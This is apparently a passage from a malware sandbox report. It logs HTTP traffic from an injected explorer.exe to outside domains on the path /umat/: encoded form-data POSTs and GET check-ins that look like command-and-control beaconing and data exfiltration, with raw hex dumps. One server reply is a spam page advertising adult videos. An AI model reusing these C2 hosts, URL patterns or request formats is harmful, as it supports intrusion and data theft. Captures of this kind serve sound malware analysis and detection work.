bT7tPLpx=5N7tMQR_kT84GzawPkGaFFZA4EAELZe6PBLwsG(L8Vt00szB7plbi5KKxeE7kbdJ(E3enqHOAFnNapBhG0des3rOC7xYSqrS5i3JeWkI4dZvwiqKFINjlIgUTEiMh2OhX2AaNMTtl7Bn6ZAI1kupX8eJ8trT8Ijn9qClE-nKJVDycT768cVx(MrOAg(kipVip9mUVc~WqgvLKnDTitibSrS81lO9osJlqjSJyoI95ozWyiwnVPl3zp6dvu8jYfPOnAE86QPg5DWgU5mPTER4xnWBITXwKFF9gBE5GswFfztZpnUuvz7VAawEEDV1H3(YpzObwKroNiF7USgCg4u6iMW6nvV0A-zJHUJYxIREcAv6z3wlfg4-Rv94hSonROfv1bens7ZmVkgP1N0VuFuGDsXPD6zx49hd(tG0JI(EXKTdzdSDOJmYKRThzfVMt4VcTLRH(GFe0HuiVPT2TCSlvWtTzqb0s_d3nRJ3Y1Yp9lEm~vO8YIHVrXyrabpi5QH2qGUd~dHRnPzRn5fDPsC9AFP3OlYOz14w1mLw6aGuXcTN4gLEfShAp8AvGhAeopl4pNFidDtqzfUIkkV4(V~k5C1NuxIRIzVfwZSJ2GGltA2aP_02(PM5Gj4HI_k4BdgRlCfG8RJ7Ov7vV2MeVSf4wECh66~baYu2092yQ_(Ot7~EwtRhpZCEmkJ4qysXF0M-yD(TCdAsKe3LhPr8PDYpyo~AhhkCp5HwNvUO~f2vJhgc7_As9hJNpJyGyf5wcOrZ3qaQnAgomHB551SXk6wnymGtwZjrG2S6Hcvx~CeElAEIqTPr(su8h3lTttnHj3F9ps6qT-5Qk3AA9HRQ4z3mfxdQ2n1sg1YoDiY6da3P3ZGwIFqD6YWd8ds-hclMvJ6r7G37KtRlqTf8wYs5Qd10PiWPmM4Ng7bjREmYlVXzvsFtWt2CjVtTj8Cn8RZ1UMNP9l~fd4aQPrj6DIG07IPZC41enw6ySsq9j9zH1xcFro~r8mLdamVXdCRQ8cC1cVpNQwUprt9-d4(acwg41yK8f0pgyM82u2rahi1-ElvVoftum1JMlpjIVlGHpgbaAb8qO0XdEeZbA_WNu93tX77s~4YP7xRitugHei3SYCil7EBh60JxNgcdHM(g0kmHtEuTPTXySwQv0QwnbF207Lf3NNU9r_Sdx9i82S21ovNblA2Ua6n6kKzi84F_azQa~2RVDAXFYNkkRksgP2yC5eJTDsoUcN8TrBwDjIH0VztJl9wnlB5BL-B1vG971dX1NSN-JTMqr93-6efnFs2Pi9AfqXhjQMsWYtMw9q(dhj2Aap~O(IwX9_~FsVYbsGtZi7P5GcJl7COb8iPBS9mCCEMlyh2EqgHR1UuhLB8yc8JTZhLQbNi62PzfN6j5KRdf~H7nBqvB5yzE(6LB1XZj0XKEbvdn799KQgWBLYY_DdX1~56USBX3tZ6KuDAxqT(BM-TEIAsIfYl97Zbcc5ISWtTTnaH0vtAV0S8mi06h1I~8LgqfOYC1AtV_NRMbp11MN1ffbhsjKPuwnc9LXhAx2TcYopNhymb40I1ylks74eI9eeq8Nql4(9DFl5Vfk71Q85d09judMcFDDYhmJz963b(dPRvDHD2aUZf8x10-4fTliiNh(RJ2w1l_jvnsCYSfSS~zWz3-eI~3iuiZLIY31sfkUPafdZFqEo1Y9fVG78~Mr9hb7t1DeP(W~EYBECxpsCD9tTRGrkFeXOG8~CB-u2dpQIx0oX(I9rkaxFmNYVPVNZKmVtQbE4uJEbHz(xUtITmifs6hN0QwgLTrP42B0E9fQzqzWp2R(euEIuFkStsKy5ejXaaViE98t9WwW4l-IqQl8MxCWeQMT9wmhNGPkrObbDctgYsE3xfGG7bzSbufozlEvTU0rKU9KP~7QjMJ3nnBw974JjH5nrbE~gL1sqkoTVcFOODFYEKlD9damOwKWf31Gov52hW0qR3PqckWmiQyHEoDBRdgFvslyWH_WpH9yjic(w6I7Jku6PQeW0A4klZrzRD-DSGsO_CWFoInqCa9m4XBIEE25Jeu~rfnycUMLyWX7xTlbsiheKdppAsJ9iwWWS9qzsmLK8r517i03LV3gQuOnJ13MI2VtPqkU-wx1IhQYP1IGv60J4npgvmXFoonrg8wXFYr6BNAsrlb~z7ijQe4XwhK8OcbR7Ge08vv~A1GmPFDdIbUUi6tABok772TBDdGTh2my_MFzs6v~hQGuB7Q4E~oXcEZumM6omFx6pI2h1b8GsQAIU59FXgOWctjBDIqx8BdTUVxvFBoG1GTnfMHxNa7qmKjuEhE87ii66dhv5DzMO~fL8mtuMtOv5P1oADDpnPJEVVsqz(PSuNpNLCegg6f(9t_jvKbwHUN8Nb2G_(3j_iVO9GuyESButylD2lSMJqkPWHV89TopbXqv0P1qwvY1ORJPzHfm8tJ5QOjfkS8Oznekxum7aEqet2ab_CZai4twcenVQFJwGk5y4NconwPlGDUpM2wssb8i5A_fmWzot2woTqAiegBAU75PpvATuiSEco1FjsmJS4bEy5zNeFl5oQUbuRQvfyoqc5dXFpoTGfrcXQ9LMJlGq(k3S7RpI4RJ1UNbTDhhDnQDC5yxD6zGgOUJyb1y7vY(VH_9B52DYWdzYOdFT~mCYKDhz~aaxdeVLfVVbIKQPwMIvIa(LhStnC5x1Gd(tn_SaUQgkd4CpZRVor8DSgsFMwgfVsHAkQJQloAj1FxNNjuRxBScr5uAcnm0j5UuadI2LUPvNGzw_QOFttwMLV-(JhaSPheM-x3w1D-9bvg8zKFeplbIKCWSrdmo_q32qLKLNyVZZrvfhNUOyZvhEJnczNiv7A2LCZzElBZhSRirvmXk5wVej2fX4j0D-jNGkUVWY1KrlDbSzs3ocqunfi2r01hlL7TCo5fEH4b5RLiIFdOrat3mwsBKLqzDS1kKpE_3E812eaXc0OFsomRRCtzTVOOX7I-2C2WFegduMNIfUjM4tfyd3rEEXWWUIbu8YxKFBHlrEg8ktLoSyC2tnZaZ-YZrAsqQjQj3SwB(x1L3qIm4r7EgS856QDs9ejCEZSe1o7mcapPfu3mb8u38O6128Ue(Z8eA3YIQY5ahAxuACj8paHnFPamAg9xz39NBXSjHqmOye5MknXyDuikmVKipoTtPESEyUW4C2Eks0lE3qnoHgCiDJRRcKerbMOhmKS232TjMhZ6InOVykPiTQJ1iB0qqra2uvPvC0SvDO8Lq68F0Xt4X1W9IQO03MB8PkxkLyD-84s4T9w4DxgIoQP5qZrQyt92KebMPt2xh0JxrcmLWV8FdgH1NKRpam34kXQIG55f(G0Yh0~Mlkv4Q25nDmHM0vQxulH7xngabhiW(E8ddGUuvBHQ5HAvnxV8BuDiZZwBv4plEi0_0em-mpLLszFHDRdnXZ7vFgqv9b4QnRshaARWDXY0DsutP3zkohtjio9p4kOJ1LRGe2NjLtLR~Z9QRWL6PJX0bcwRSYT3hHNHv-ZMbP4HbiqRK881yg9nK_Clmy2ilUJrgalvn8n7VcFAlbfg0SSQ3Y(fXu2jVMppAVn-evJDKah3S6NACg~N5CQcyb1E8kl1yC(TwQd9Nps2uhvG0pOQNs(fwsh0oXrzIHCLMVt1jeBozUKL8tk010n5xObqABOXwkGjzEGJu1Zg9JJkEyufXNjgiJiWweHTdm6xaCzqoDZaeUIe4v7-gSkWQ5dvkJqb4jnycouwuK~SJoIhVM~xS8sJOok7TskpCbQgjylwwRQSYxWu1f7hfHsorthl0nh8cAC9OEgkXp8MAc04pnPCijy6d8xQmstFQ0XymqNVeOd7kHunOhu5ZA8mMtHT4doPcuBPUkQ3y4ACjjE5WkiEdeU2VwR5X44-auVHEe9o9RNZ0faQS4t8Yn7VYN40AYMZt3cuGjcJIgvhxz24UhGTPR6oeJQ1ufWrv8EtntIaVfhMGl6nDx4uynXHlQb1sWmyjGSJFGbTIFGZtlkzUjvQ9-mdHxZ0dwpglLg00-jHyNmMVCm7LIFwU6FteTTpjuQSnotv4klBdBmDl
                                                                                                          Jun 3, 2022 08:19:23.968545914 CEST11282OUTData Raw: 78 4d 43 7a 79 69 62 39 52 74 63 4f 7a 56 62 56 50 63 45 7a 6b 63 51 34 6e 68 62 4c 31 63 45 50 58 4c 36 45 47 65 7e 47 50 59 6b 75 64 63 45 4c 79 4f 73 76 57 49 47 35 77 56 70 75 55 45 4f 49 6f 7a 39 4a 66 36 6e 77 4b 56 62 5f 39 39 70 64 43 34
                                                                                                          Data Ascii: xMCzyib9RtcOzVbVPcEzkcQ4nhbL1cEPXL6EGe~GPYkudcELyOsvWIG5wVpuUEOIoz9Jf6nwKVb_99pdC4nt8WIRCkxGfpKt5wmDQtYy0Oi4Z50xElvBoFdQe4vuBsYNa1NddvlW4SDmv84owIDA0vu85ZF6PlzvX-I40jJnO3GHPhbWDzzbwzkd2vpDWVEF2tPad8BWm4LM1Ot3GZ7ajcJT~h3FxX8qGVi0xjjm1U51nCmXJ7~
                                                                                                          Jun 3, 2022 08:19:24.141885042 CEST11289OUTData Raw: 42 65 30 75 70 68 65 58 76 6b 4d 2d 51 5f 67 35 36 5a 42 49 44 4d 65 38 31 43 58 36 38 77 56 55 65 51 37 72 4b 6f 64 4b 58 6b 48 50 76 4a 72 76 4a 43 33 55 71 78 57 35 4b 63 4c 4a 36 44 59 54 47 55 41 46 76 51 6d 73 41 43 4a 79 46 4a 39 68 57 51
                                                                                                          Data Ascii: Be0upheXvkM-Q_g56ZBIDMe81CX68wVUeQ7rKodKXkHPvJrvJC3UqxW5KcLJ6DYTGUAFvQmsACJyFJ9hWQNMpNUEPKemtH2t2TXkwY2tIfkCR3MXjvyeAUiwDmM0zeUAtbvNVzE6Uxo771VdSWjcQqbDxu3VUBx58j2lltdzyhdCUMqrbdsPhasZTI4wCPKEGSiLSC3xiecFbk9PuN5eJKeTtuIZZx5M7V4naFvIkm7HabL3aSp


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          19192.168.2.449893154.36.145.11080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:19:23.968199015 CEST11261OUTGET /umat/?bT7tPLpx=2PPXS0ByghwnUiXofzfHcTluxn0kF7CQXUmv2gLgzHNDwPHvxa5MhM39jfYs7JtQ10qs&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.huayugw.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 3, 2022 08:19:24.144052982 CEST11291INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:19:34 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 1796
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 cd f2 c4 fe b4 cf d5 da b1 a3 cf d5 b9 c9 b7 dd d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 34 35 30 33 3b 26 23 32 32 32 36 39 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 26 23 33 37 33 32 35 3b 26 23 32 31 34 37 35 3b 26 23 32 31 34 36 34 3b 26 23 32 34 35 37 37 3b 2c 26 23 33 31 35 33 32 3b 26 23 32 31 33 31 33 3b 26 23 32 30 31 30 38 3b 26 23 32 32 32 33 38 3b 26 23 32 30 38 35 32 3b 26 23 32 30 31 31 33 3b 26 23 32 34 33 32 34 3b 26 23 33 38 36 33 32 3b 26 23 32 31 34 34 38 3b 26 23 32 36 31 34 39 3b 26 23 33 39 31 31 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 31 31 35 30 3b 26 23 32 30 38 34 34 3b 26 23 32 33 34 36 30 3b 26 23 33 33 31 35 31 3b 26 23 33 31 31 39 32 3b 26 23 32 30 30 37 30 3b 26 23 33 32 3b 26 23 32 32 39 30 39 3b 26 23 32 39 32 34 35 3b 26 23 32 32 39 30 39 3b 26 23 33 32 30 33 39 3b 2c 26 23 32 34 33 32 34 3b 26 23 33 30 33 34 30 3b 26 23 33 32 37 36 39 3b 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 31 34 36 33 3b 26 23 31 39 39 38 31 3b 26 23 32 30 31 30 32 3b 26 23 32 30 31 30 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 32 36 35 34 3b 26 23 32 32 38 39 39 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 37 37 30 34 3b 26 23 32 30 30 33 37 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 33 31 35 33 32 3b 26 23 32 31 33 31 33 3b 26 23 32 30 31 30 38 3b 26 23 32 32 32 33 38 3b 26 23 32 30 38 35 32 3b 26 23 32 30 31 31 33 3b 26 23 32 34 33 32 34 3b 26 23 33 38 36 33 32 3b 26 23 32 31 34 34 38 3b 26 23 32 36 31 34 39 3b 26 23 33 39 31 31 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 31 31 35 30 3b 26 23 32 30 38 34 34 3b 26 23 32 33 34 36 30 3b 26 23 33 33 31 35 31 3b 26 23 33 31 31 39 32 3b 26 23 32 30 30 37 30 3b 26 23 33 32 3b 26 23 32 32 39 30 39 3b 26 23 32 39 32 34 35 3b 26 23 32 32 39 30 39 3b 26 23 33 32 30 33 39 3b 2c 26 23 32 34 33 32 34 3b 26 23 33 30 33 34 30 3b 26 23 33 32 37 36 39 3b 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 31 34 36 33 3b 26 23 31 39 39 38 31 3b 26 23 32 30 31 30 32 3b 26 23 32 30 31 30 32 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 32 35 39 31 38 3b 26 23 33 33 36 33 33 3b 26 23 32 37 39 36 36 3b 26 23 32 33 35 34 35 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 2c 26 23 33 31 35 33 32 3b 26 23 32 31 33 31 33 3b 26 23 32 30 31 30 38 3b 26 23 32 32 32 33 38 3b 26 23 32 30 38 35 32 3b 26 23 32 30 31 31 33 3b 26 23 32 34 33 32 34 3b 26 23 33 38 36 33 32 3b 26 23 32 31 34 34 38 3b 26 23 32 36 31 34 39 3b 26 23 33 39 31 31 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 31 31 35 30 3b 26 23 32 30 38 34 34 3b 26 23 32 33 34 36 30 3b 26 23 33 33 31 35 31 3b 26 23 33 31 31 39 32 3b 26 23 32 30 30 37 30 3b 26 23 33 32 3b 26 23 32 32 39 30 39 3b 26 23 32 39 32 34 35 3b 26 23 32 32 39 30 39 3b 26
                                                                                                          Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#24503;&#22269;&#118;&#105;&#100;&#101;&#111;&#115;&#37325;&#21475;&#21464;&#24577;,&#31532;&#21313;&#20108;&#22238;&#20852;&#20113;&#24324;&#38632;&#21448;&#26149;&#39118;&#35270;&#39057;,&#21150;&#20844;&#23460;&#33151;&#31192;&#20070;&#32;&#22909;&#29245;&#22909;&#32039;,&#24324;&#30340;&#32769;&#29087;&#22919;&#21463;&#19981;&#20102;&#20102;</title><meta name="keywords" content="&#32654;&#22899;&#35270;&#39057;&#22312;&#32447;&#27704;&#20037;&#20813;&#36153;&#35266;&#30475;,&#31532;&#21313;&#20108;&#22238;&#20852;&#20113;&#24324;&#38632;&#21448;&#26149;&#39118;&#35270;&#39057;,&#21150;&#20844;&#23460;&#33151;&#31192;&#20070;&#32;&#22909;&#29245;&#22909;&#32039;,&#24324;&#30340;&#32769;&#29087;&#22919;&#21463;&#19981;&#20102;&#20102;" /><meta name="description" content="&#27431;&#32654;&#25918;&#33633;&#27966;&#23545;&#118;&#105;&#100;&#101;&#111;&#115;,&#31532;&#21313;&#20108;&#22238;&#20852;&#20113;&#24324;&#38632;&#21448;&#26149;&#39118;&#35270;&#39057;,&#21150;&#20844;&#23460;&#33151;&#31192;&#20070;&#32;&#22909;&#29245;&#22909;&
                                                                                                          Jun 3, 2022 08:19:24.144079924 CEST11291INData Raw: 23 33 32 30 33 39 3b 2c 26 23 32 34 33 32 34 3b 26 23 33 30 33 34 30 3b 26 23 33 32 37 36 39 3b 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 31 34 36 33 3b 26 23 31 39 39 38 31 3b 26 23 32 30 31 30 32 3b 26 23 32 30 31 30 32 3b 2c 26
                                                                                                          Data Ascii: #32039;,&#24324;&#30340;&#32769;&#29087;&#22919;&#21463;&#19981;&#20102;&#20102;,&#23569;&#22919;&#19968;&#36793;&#21627;&#21535;&#19968;&#36793;&#35828;&#20351;&#21170;,&#20037;&#20037;&#101;&#114;&#28909;&#22312;&#36825;&#37324;&#21482;&#263


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          2192.168.2.44978418.193.36.15380C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:26.897332907 CEST9578OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.drivetrianrepair.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.drivetrianrepair.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.drivetrianrepair.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 70 67 66 38 43 4b 6a 36 75 4e 4c 43 78 45 49 77 6d 33 37 62 45 4e 56 58 59 35 7a 69 79 4b 58 4f 55 37 31 45 31 36 76 6a 6e 6e 59 49 6f 78 67 44 28 69 6a 30 52 31 57 38 56 7a 4c 74 33 4d 52 46 74 44 49 2d 54 76 43 79 4c 5a 32 64 4e 42 4b 79 69 4e 28 31 38 5f 53 31 46 31 50 58 53 69 7e 41 72 58 6e 4f 52 48 42 34 54 2d 6d 71 44 6f 33 69 34 46 4d 4b 53 44 39 34 6c 50 54 71 70 54 4d 7a 4b 79 70 41 30 31 70 73 39 74 56 43 42 2d 43 74 43 56 74 6c 78 79 48 4b 63 79 6b 63 31 59 37 63 57 36 46 35 35 33 36 75 42 37 45 61 33 6b 6c 77 77 53 66 38 47 46 75 75 4f 66 43 77 78 41 45 61 73 77 62 50 6f 53 49 69 39 53 55 56 4a 42 74 36 7e 31 36 37 30 31 4c 53 71 4d 53 4e 4d 57 6d 47 6e 6b 76 5a 34 44 65 59 38 66 31 63 4f 38 61 44 62 43 4e 37 5a 53 4e 53 78 61 41 66 49 66 49 78 36 43 56 77 30 74 72 76 66 4b 6e 36 73 68 59 35 45 6f 69 74 75 70 41 62 4a 78 35 67 70 64 45 45 73 44 73 45 79 4e 55 47 42 35 4b 6d 4b 67 48 4d 6b 6d 7e 6f 70 72 71 59 39 4a 57 36 69 76 6c 45 35 53 50 46 68 76 47 54 31 49 46 53 56 48 51 68 66 63 35 72 52 4c 64 59 55 72 79 52 63 7a 57 59 41 32 6e 59 4b 37 55 43 4b 4d 37 44 45 62 55 78 57 36 54 71 50 5f 28 37 41 41 73 46 46 6d 7e 53 75 55 39 5f 64 6d 62 4c 72 62 62 6e 48 67 4d 4e 32 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: bT7tPLpx=pgf8CKj6uNLCxEIwm37bENVXY5ziyKXOU71E16vjnnYIoxgD(ij0R1W8VzLt3MRFtDI-TvCyLZ2dNBKyiN(18_S1F1PXSi~ArXnORHB4T-mqDo3i4FMKSD94lPTqpTMzKypA01ps9tVCB-CtCVtlxyHKcykc1Y7cW6F5536uB7Ea3klwwSf8GFuuOfCwxAEaswbPoSIi9SUVJBt6~16701LSqMSNMWmGnkvZ4DeY8f1cO8aDbCN7ZSNSxaAfIfIx6CVw0trvfKn6shY5EoitupAbJx5gpdEEsDsEyNUGB5KmKgHMkm~oprqY9JW6ivlE5SPFhvGT1IFSVHQhfc5rRLdYUryRczWYA2nYK7UCKM7DEbUxW6TqP_(7AAsFFm~SuU9_dmbLrbbnHgMN2Q).
                                                                                                          Jun 3, 2022 08:17:26.916953087 CEST9578INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx
                                                                                                          Date: Fri, 03 Jun 2022 06:17:26 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          D-Geo: EU
                                                                                                          Content-Encoding: gzip
                                                                                                          Data Raw: 38 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 3d 8e 41 0a 02 31 0c 45 af 92 13 58 66 1f 72 04 71 eb b2 63 c3 b4 50 9b 92 a4 8a b7 b7 58 c6 ed e7 bf ff 3e 66 7f 56 c2 cc 31 11 7a f1 ca 74 15 07 1b bd 8b 3a 27 0c 2b c4 b0 2a bb a4 0f e1 83 9b b3 4e 6c a3 bb 0c 85 5d e5 6d ac f0 62 b5 22 0d 8a 41 13 a8 d2 8e 19 fe b7 2e 70 ab 1c 8d 61 f4 43 63 62 70 01 cf 0c 35 3a 9b 9f f0 34 6d 84 e1 54 84 65 0c bf 9f 5f bc 2a 38 15 ae 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 8a=A1EXfrqcPX>fV1zt:'+*Nl]mb"A.paCcbp5:4mTe_*80


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          3192.168.2.44978518.193.36.15380C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:17:26.921689034 CEST9592OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.drivetrianrepair.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.drivetrianrepair.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.drivetrianrepair.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 70 67 66 38 43 4b 65 76 71 39 33 62 37 30 4d 54 67 46 37 48 4c 73 6c 52 61 4a 28 35 7e 76 76 34 66 70 63 31 6f 49 6e 30 6d 6d 67 43 69 52 39 68 37 6c 32 6e 52 77 72 53 53 42 76 70 7a 73 56 47 74 44 52 64 54 76 47 79 49 5a 65 4e 4e 6e 57 59 6a 76 6e 36 34 66 54 51 55 46 4f 42 57 6a 69 35 72 58 7a 34 52 45 68 53 54 4f 61 71 44 4c 66 69 7e 48 6b 37 49 54 38 53 35 66 44 32 6e 7a 49 45 4b 79 42 59 30 77 52 73 7e 64 52 43 44 65 79 73 45 55 73 7a 75 43 47 68 4d 43 6c 43 38 34 6e 32 57 36 42 58 35 7a 36 75 43 4f 30 61 6d 6e 74 77 34 42 6e 39 4e 56 75 76 4b 66 43 70 6e 41 34 78 73 32 28 35 6f 54 38 63 38 67 49 56 4c 78 74 75 36 6d 61 4a 6c 57 6a 37 73 4d 6e 76 4d 57 71 76 6e 31 43 47 34 43 79 67 37 74 63 69 42 2d 43 35 62 45 56 46 59 79 4e 65 6a 36 41 2d 49 66 49 37 36 43 56 65 30 74 37 76 66 4c 28 36 39 77 49 35 52 34 69 75 31 70 42 65 54 42 34 6d 74 63 34 75 73 48 41 2d 79 4a 51 77 41 4b 79 6d 4b 78 58 4d 78 56 57 33 68 72 71 65 71 5a 57 39 7a 5f 6c 62 35 53 50 37 68 75 47 44 31 5f 46 53 58 53 38 68 65 35 4e 72 63 62 64 59 66 4c 79 54 56 54 53 49 41 33 50 63 4b 36 6b 53 4b 5f 58 44 45 4a 63 78 57 65 6e 71 4a 50 28 37 5a 77 74 46 4e 6c 76 37 34 48 68 7a 63 6c 54 43 6b 4e 75 7a 48 53 74 41 74 44 39 61 37 75 77 4e 6c 5a 67 75 65 70 54 5a 67 54 31 5a 75 68 43 5f 62 54 54 35 57 33 54 32 44 5f 78 4a 4b 59 46 63 30 32 43 33 5a 46 6c 68 7a 35 30 55 79 2d 65 62 4f 79 4f 55 6f 30 46 74 79 6b 55 52 4f 66 6a 66 4c 73 38 73 70 2d 4f 4d 33 46 6c 35 6e 74 35 53 37 47 41 7a 45 2d 64 41 54 4e 77 4c 50 4c 56 4c 43 4a 66 6d 56 39 52 48 35 32 7e 6f 39 55 44 59 4b 53 63 4c 38 6a 55 58 4a 69 78 4b 6d 6c 42 2d 34 5f 28 54 39 54 62 58 70 77 69 56 62 31 6f 41 53 4b 53 4d 63 71 6f 64 6f 45 39 4c 62 30 37 76 68 74 79 69 55 68 74 5a 4c 78 68 49 74 62 63 4b 72 66 5a 78 4a 51 54 5a 39 6b 41 6f 69 6e 76 77 6d 7a 4c 4b 73 76 56 78 5a 59 67 4d 73 36 56 69 52 54 55 48 36 76 6e 4a 62 62 44 6f 53 54 4e 42 53 6b 62 33 72 79 65 34 56 41 50 38 50 46 56 4f 53 6e 45 36 45 50 65 50 7e 44 73 79 39 47 6c 39 62 4d 31 73 77 46 6b 46 7e 5f 74 67 39 59 45 61 79 6b 46 64 43 58 65 42 4d 30 55 65 4a 71 66 50 65 78 4f 45 4c 55 61 53 33 69 28 30 76 36 45 41 52 58 7a 41 4c 6e 67 56 45 70 56 35 61 35 33 38 4b 47 76 30 72 77 5a 65 34 4f 33 79 35 5a 38 72 4e 33 4b 59 77 4b 43 52 56 39 7e 53 6a 71 39 5f 49 72 6c 47 79 55 39 5f 58 6b 49 77 44 4a 76 43 42 36 49 47 31 6e 53 66 64 35 58 37 50 46 59 49 35 70 77 34 74 42 4b 76 35 72 4f 35 53 38 4d 46 36 70 57 6b 48 50 68 68 38 70 37 55 64 6b 61 74 7e 34 57 44 33 51 32 77 67 30 7a 39 35 59 7e 4b 51 49 69 2d 35 42 6e 65 38 52 42 6e 50 69 41 4d 48 62 45 4e 71 66 61 42 59 4e 37 53 6c 64 51 72 45 4d 41 6e 4f 51 73 44 41 75 57 63 38 72 6f 57 48 4e 42 46 35 77 7e 66 79 51 37 66 34 6f 4f 71 33 43 6e 4e 76 5a 77 48 6c 44 61 4e 65 77 38 31 51 35 55 6c 6b 58 69 31 49 54 41 47 66 71 63 32 48 71 53 47 34 57 67 6f 47 45 38 65 6f 6e 77 48 46 6f 45 31 77 48 59 4b 6f 47 4e 67 37 42 58 75 75 33 4a 67 4f 47 4f 67 48 49 5a 65 45 57 43 74 7e 4f 58 52 7e 43 33 39 47 53 68 5f 76 70 38 77 71 30 4f 34 6f 68 6d 5a 72 49 28 48 76 58 4f 34 4a 37 42 46 7a 39 30 30 62 67 57 4d 73 35 53 62 72 62 46 50 70 49 4a 79 42 53 39 62 6d 4f 74 55 4e 6a 71 4f 4d 4e 72 69 44 62 64 5f 38 72 6f 2d 4a 76 72 75 4b 79 66 6e 57 78 39 33 57 65 73 64 37 4a 51 6f 76 5a 56 76 6a 4b 42 39 4c 44 53 63 73 44 6d 6d 7e 64 6a 70 77 4f 78 42 58 66 61 4a 76 56 39 55 71 35 6c 7a 45 66 38 73 55 71 4b 4d 54 55 4c 6c 6b 46 45 4d 71 6a 59 32 62 34 79 2d 28 68 50 56 48 59 31 64 65 64 7a 74 47 71 47 70 7a 52 31 35 77 75 47 6f 57 59 4f 52 4c 45 37 52 4a 4e 7a 65 6a 55 42 61 75 6e 4a 66 6c 56 5a 4a 78 34 34 75 58 63 55 7a 51 79 45 6b 42 55 43 52 71 55 68 46 45 4b 44 32 46 30 52 75 4d 2d 76 4c 33 76 51 39 59 79 4a 54 78 4f 69 66 55 66 37 4f 75 35 30 57 51 39 68 39 28 56 4c 67 49 68 51 36 62 46 6b 49 36 55 6c 32 37 6f 73 36 4e 62 5a 57 7e 53 53 66 36 48 45 53 64 46 76 57 65 47 42 57 77 52 6f 4c 62 68 45 54 5a 30 74 54 75 69 47 32 4e 72 43 78 33 79 57 30 42 59 42 33 32 35 48 5a 44 54 6a 2d 58 38 5a 4e 34 70 5a 2d 73 39 75 5a 67 34 53 65 70 71 71 78 52 6a 78 53 6b 46 39 71 63 47
